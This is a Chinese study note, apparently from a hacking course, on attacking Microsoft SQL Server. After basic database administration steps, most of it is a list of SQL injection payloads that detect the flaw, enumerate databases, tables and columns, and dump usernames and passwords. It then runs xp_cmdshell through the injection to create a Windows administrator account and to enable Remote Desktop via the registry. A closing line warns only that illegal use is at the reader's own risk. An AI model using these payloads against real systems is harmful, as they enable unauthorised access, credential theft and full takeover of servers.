某教程学习笔记(一):08、MSSQL数据库漏洞

简介: 某教程学习笔记(一):08、MSSQL数据库漏洞

一、MSSQL介绍


MSSQL商业,性能好,易用,企业支持好,有很多精度要高的类型,学校、政府、在线办公、游戏、棋牌等部门可能会用。


端口:1433


后缀:.mdf/.ldf


sa权限:数据库操作,文件管理,命令执行,注册表读取等,相当于win系统system


db权限:文件管理,数据库操作等,相当于win系统adminnstrators


public权限:数据库操作,相当于win系统guest


二、SQL SERVER 2005


1、安装成功,输入账号密码登陆

0a2653c851af460fa595bd959398a8f1.png

2、master、model、msdb、tempdb这四个数据库是系统自带数据库

0eacb84100b54626af849e6b562bf92a.png

3、右击数据库,新建数据库,自动生成两个文件

2d65d23f6d4748949b924e4057485923.png

4、双击展开新建的数据库,右击表,添加表,输入列名和数据类型,保存

2e9b90b2ca334476abebe75bafe6eeaa.png

5、右击新建的表,打开表,然后就可以添加我们的数据了

4cebaac233b3433da32a72337a77fc60.png

6、删除数据库,需要先右击要删除的数据库,选择任务,再选择分离,然后再进目录删除数据库


7、添加外来的数据库,先把数据库文件放进目录,然后右击数据数据库,选择附加


8、备份数据库,选择要备份的数据库右击,选择生成脚本,选择为服务器版本编写脚本(修改为自己要用的版本)


9、还原数据库,将导出的脚本里面的内容复制到sql语句,运行,就会和重新生成一个数据库,里面的内容和备份数据库的内容一样。


三、代码调用


<%


cctt = “provier=sqloledb;source=local;uid=sa;pwd=**;database=database1”


Set conn = Server.Createobject(“ADODB.Connection”)


conn.open cctt


%>


provider后面的不用管,照写; source后面的可以是ip地址,这里我用的是本地的;sa是内置的用户,它的密码是你在安装的时候设置的; database后面是你要连接的数据库的名称.


四、判断注入


and 1=1 返回正常


and 1=2 返回错误,说明有注入


and user>0 返回正常,说明是sqlserver注入


and (select count(*)from sysobjects)>0 mssql 返回正常,说明是sqlserver注入


猜数表名


and( select count()from[表名])>0


猜字段


and( select Count(字段名)from[表名])>0


猜字段中记录长度


and(select top1len(字段名)from表名)>0


猜字段的asc值( access)


and( (select top1 asc(mid(字段名,1,1)from表名)>0


猜字段的ascii值(mssql)


and( select top1 unicode(substring(字段名1,1)from表名)>0


测试权限结构( mssql)


and 1=(select IS_SRVROLEMEMBER(‘sysadmin’));-- //判断是否是系统管理员


and 1=(select IS_SRVROLEMEMBERC(‘serveradmin’));–


and 1=(select IS_SRVROLEMEMBERC(‘setupadmin’));–


and 1=(select IS_SRVROLEMEMBERC(‘securityadmin’));–


and 1=(select IS_SRVROLEMEMBER(‘diskadmin’));–


and 1=(select IS_SRVROLEMEMBER(‘bulkadmin’);–


and 1=(select is_srvrolemember(‘db_owner’));–//判断是否是库权限


and 1=(select is_srvrolemember(‘public’));–//判断是否是pubilc权限


and 1=convert(int,db_name())或1=(select db_name())//当前数据库名


and 1=(select @@servername)//本地服务名


and 1=(select HAS_DBACCESS(‘master’))//判断是否有库读取权限


猜版本号


id=1 and 1=(select @@version)


id=@@version


猜数据库名称


id=1 and 1=(select db_name())


id=db_name()


获取所有数据库


id=1 and 1=(select name from master…sysdatabases for xml path)


获取第一个用户数据库


id=1 and 1=(select top 1 name from master…sysdatabases where dbid>4) #数据库是从第五个开始排的


获取下一个数据库


id=1 and 1=(select top 1 name from master…sysdatabases where dbid>4 and name <>‘上面查出来的数据库’)


或者


id=1 and 1=(select top 1 name from master…sysdatabases where dbid>5) #一次类推


获取所有表


id=1 and 1=(select name from sysobjects for xml path)


获取第一张表


id=1 and 1=(select top 1 name from sysobjects where xtype=‘u’)


获取下一张表


id=1 and 1=(select top 1 name from sysobjects where xtype=‘u’ and name <>‘上面查出来的表’)


获取表users第一列列名uname


id=1 and 1=(select top 1 name from syscolumns where id=(select id from sysobjects where name=‘users’))


获取表users第二列列名upass


id=1 and 1=(select top 1 name from syscolumns where id=(select id from sysobjects where name=‘users’) and name <> ‘uname’)


依次往后爆破


获取表users第一个用户名


?id=1 and 1=(select top 1 uname from users)


获取密码


?id=1 and 1=(select top 1 upass from users)


五、利用xp_cmdshell添加用户


id=1 ;exec master…xp_cmdshell ‘net user username password /add’


id=1 ;exec master… xp_cmdshell ‘net localgroup administrators username /add’ 添加到管理员组


六、开启3389端口


id=1 ;exec master…xp_cmdshell ‘sc config termservice start=auto’


;exec master…xp_cmdshell ‘net start termservice’


;exec master…xp_cmdshell ‘reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server” /vfDenyTSConnections /t REG_DWORD/d 0x0/f’


禁止非法,后果自负

目录
相关文章
|
7月前
|
存储 SQL 关系型数据库
Mysql学习笔记(二):数据库命令行代码总结
这篇文章是关于MySQL数据库命令行操作的总结,包括登录、退出、查看时间与版本、数据库和数据表的基本操作(如创建、删除、查看)、数据的增删改查等。它还涉及了如何通过SQL语句进行条件查询、模糊查询、范围查询和限制查询,以及如何进行表结构的修改。这些内容对于初学者来说非常实用,是学习MySQL数据库管理的基础。
256 6
|
3月前
|
存储 关系型数据库 分布式数据库
PolarDB 开源基础教程系列 8 数据库生态
PolarDB是一款开源的云原生分布式数据库,源自阿里云商业产品。为降低使用门槛,PolarDB携手伙伴打造了完整的开源生态,涵盖操作系统、芯片、存储、集成管控、监控、审计、开发者工具、数据同步、超融合计算、ISV软件、开源插件、人才培养、社区合作及大型用户合作等领域。通过这些合作伙伴,PolarDB提供了丰富的功能和服务,支持多种硬件和软件环境,满足不同用户的需求。更多信息请访问[PolarDB开源官方网站](https://openpolardb.com/home)。
139 4
|
4月前
|
关系型数据库 MySQL API
新手教程:数据库操作(使用PDO或MySQLi扩展)
本文为新手介绍如何使用PDO和MySQLi扩展连接与操作MySQL数据库。PDO更现代灵活,支持多种数据库,适合大多数应用;MySQLi提供面向过程和面向对象两种API,适合直接控制数据库操作。教程涵盖安装配置、创建连接、执行查询(查询、插入、更新、删除)及错误处理等内容。希望这篇教程能帮助你快速上手PHP中的数据库操作!
231 32
|
6月前
|
存储 机器学习/深度学习 监控
南大通用GBase 8s数据库onbar基础使用教程
数据备份与恢复是确保数据安全和业务连续性的关键。onbar作为GBase 8s数据库的备份工具,需配合存储管理器使用,通过配置BAR_BSALIB_PATH等参数,实现数据的备份与恢复。本文详细介绍了onbar的配置、备份、恢复及监控流程,帮助数据库管理员构建高效的数据保护方案。
|
7月前
|
存储 SQL 关系型数据库
【入门级教程】MySQL:从零开始的数据库之旅
本教程面向零基础用户,采用通俗易懂的语言和丰富的示例,帮助你快速掌握MySQL的基础知识和操作技巧。内容涵盖SQL语言基础(SELECT、INSERT、UPDATE、DELETE等常用语句)、使用索引提高查询效率、存储过程等。适合学生、开发者及数据库爱好者。
194 0
【入门级教程】MySQL:从零开始的数据库之旅
|
7月前
|
SQL NoSQL MongoDB
一款基于分布式文件存储的数据库MongoDB的介绍及基本使用教程
一款基于分布式文件存储的数据库MongoDB的介绍及基本使用教程
120 0
|
7月前
|
存储 NoSQL API
.NET NoSQL 嵌入式数据库 LiteDB 使用教程
.NET NoSQL 嵌入式数据库 LiteDB 使用教程~
225 0
|
13天前
|
负载均衡 算法 关系型数据库
大数据大厂之MySQL数据库课程设计:揭秘MySQL集群架构负载均衡核心算法:从理论到Java代码实战,让你的数据库性能飙升!
本文聚焦 MySQL 集群架构中的负载均衡算法,阐述其重要性。详细介绍轮询、加权轮询、最少连接、加权最少连接、随机、源地址哈希等常用算法,分析各自优缺点及适用场景。并提供 Java 语言代码实现示例,助力直观理解。文章结构清晰,语言通俗易懂,对理解和应用负载均衡算法具有实用价值和参考价值。
大数据大厂之MySQL数据库课程设计:揭秘MySQL集群架构负载均衡核心算法:从理论到Java代码实战,让你的数据库性能飙升!
|
2月前
|
关系型数据库 MySQL Java
【YashanDB知识库】原生mysql驱动配置连接崖山数据库
【YashanDB知识库】原生mysql驱动配置连接崖山数据库
【YashanDB知识库】原生mysql驱动配置连接崖山数据库
|
13天前
|
存储 关系型数据库 MySQL
大数据新视界 --面向数据分析师的大数据大厂之 MySQL 基础秘籍:轻松创建数据库与表,踏入大数据殿堂
本文详细介绍了在 MySQL 中创建数据库和表的方法。包括安装 MySQL、用命令行和图形化工具创建数据库、选择数据库、创建表(含数据类型介绍与选择建议、案例分析、最佳实践与注意事项)以及查看数据库和表的内容。文章专业、严谨且具可操作性,对数据管理有实际帮助。
大数据新视界 --面向数据分析师的大数据大厂之 MySQL 基础秘籍:轻松创建数据库与表,踏入大数据殿堂

热门文章

最新文章